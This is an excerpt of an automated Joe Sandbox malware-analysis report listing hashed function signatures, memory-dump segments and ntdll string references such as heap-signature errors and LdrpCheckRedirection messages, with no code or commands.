                                                                                                • Opcode ID: ccd7df3a8a05f9bc253a8275062105cc7c6af38451b94501c535accaca7c4ad7
                                                                                                • Instruction ID: 9a4491055c70d8de794fc40fe949290fd97c223e611bce3e6f49e5b98b109bdb
                                                                                                • Opcode Fuzzy Hash: ccd7df3a8a05f9bc253a8275062105cc7c6af38451b94501c535accaca7c4ad7
                                                                                                • Instruction Fuzzy Hash: 3F810A76D002699BEB318F54CC44BEABBB4AB58714F0441DBEA19B7290D7709E85CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                • API String ID: 3446177414-56086060
                                                                                                • Opcode ID: 6e2649f3b8834998fabbeecfe94a769125846769bc035fd85398108243e0d061
                                                                                                • Instruction ID: a2400418658f6864cc4865642a43938ca677ab215846c304b870d4b46f425fc5
                                                                                                • Opcode Fuzzy Hash: 6e2649f3b8834998fabbeecfe94a769125846769bc035fd85398108243e0d061
                                                                                                • Instruction Fuzzy Hash: DD414671A00341DFDB22DF69C484B6ABFA5EF11724F1440AFE9458B7B2C774A889CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                • LdrpCheckRedirection, xrefs: 014B488F
                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 014B4899
                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 014B4888
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                • API String ID: 3446177414-3154609507
                                                                                                • Opcode ID: 75131afd21721d2f1666ebae35d81ec02d3c8ee72f4b0df8ac937d0e5970c6e6
                                                                                                • Instruction ID: 42f8e3af15fb4efa5866a76cc194f9b5421051ac7113aa2ab28e196cb8ef59f6
                                                                                                • Opcode Fuzzy Hash: 75131afd21721d2f1666ebae35d81ec02d3c8ee72f4b0df8ac937d0e5970c6e6
                                                                                                • Instruction Fuzzy Hash: 8541C436A046519BCB21CE5DD8C0AA77BE4AF49650B0E056FED5A9B373D730D801CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                • API String ID: 3446177414-3526935505
                                                                                                • Opcode ID: 11b41859210970b469e3afb167ae686f5ced96aafcb18be70cd6e695a914d310
                                                                                                • Instruction ID: 24991b65fb5148d3154191351046284f78e897ee84b54e330404e79d2bf27f6e
                                                                                                • Opcode Fuzzy Hash: 11b41859210970b469e3afb167ae686f5ced96aafcb18be70cd6e695a914d310
                                                                                                • Instruction Fuzzy Hash: 7031F431604790DFDB239B69C409B5A7FE4EF11650F14409FE8528B7B2C7B8A889CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: $
                                                                                                • API String ID: 3446177414-3993045852
                                                                                                • Opcode ID: 9aea3eb865c52fc0fde4a713a666ea4a15ed7b0a94fb9e1a151f203f3e13cfa5
                                                                                                • Instruction ID: ebd526e877e969d70ea888be337dc2e8cdebb3393fca9630e86d37aa54d7ae21
                                                                                                • Opcode Fuzzy Hash: 9aea3eb865c52fc0fde4a713a666ea4a15ed7b0a94fb9e1a151f203f3e13cfa5
                                                                                                • Instruction Fuzzy Hash: 5D118E32A01218EBCF25AF95E848A9D7B71FF55364F10811AFC2A6B2E0CB315A00DB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID:
                                                                                                • API String ID: 3446177414-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID:
                                                                                                • API String ID: 3446177414-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                • String ID:
                                                                                                • API String ID: 4281723722-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @
                                                                                                • API String ID: 0-2766056989
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
                                                                                                • String ID: +$-
                                                                                                • API String ID: 1302938615-2137968064
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: Bl$l
                                                                                                • API String ID: 3446177414-208461968
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 01475E34
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorHandling__start
                                                                                                • String ID: pow
                                                                                                • API String ID: 3213639722-2276729525
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$Flst
                                                                                                • API String ID: 0-758220159
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RtlDebugPrintTimes.NTDLL ref: 0145D959
                                                                                                  • Part of subcall function 01434859: RtlDebugPrintTimes.NTDLL ref: 014348F7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: $$$
                                                                                                • API String ID: 3446177414-233714265
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: $
                                                                                                • API String ID: 3446177414-3993045852
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: 0$0
                                                                                                • API String ID: 3446177414-203156872
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%